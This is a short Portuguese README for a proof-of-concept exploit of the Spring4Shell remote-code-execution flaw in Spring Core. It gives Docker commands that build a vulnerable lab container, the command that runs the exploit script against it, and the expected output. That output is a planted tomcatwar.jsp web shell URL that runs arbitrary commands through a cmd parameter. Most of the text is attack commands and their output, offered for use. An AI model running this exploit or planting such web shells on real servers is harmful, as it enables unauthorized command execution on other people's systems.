
Outro POC do spring4shell (RCE do Spring core)
Esta vulnerabilidade afeta o Spring Core e permite que um atacante envie uma solicitação HTTP especialmente elaborada para contornar as proteções no parser de solicitações HTTP da biblioteca, levando à execução remota de código.
Mais informações Aqui

Para que esta vulnerabilidade seja explorada, várias condições devem ser atendidas
docker build . -t springshell-rce-poc
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
python exploit-poc.py --url "http://127.0.0.1:8081/"
A resposta esperada
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami
Se você acessar esta URL, ela executará qualquer comando que você quiser cmd=<whatyouwant>

Se você acessar o contêiner via ssh, verá que um novo arquivo foi criado tomcatwar.jsp
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT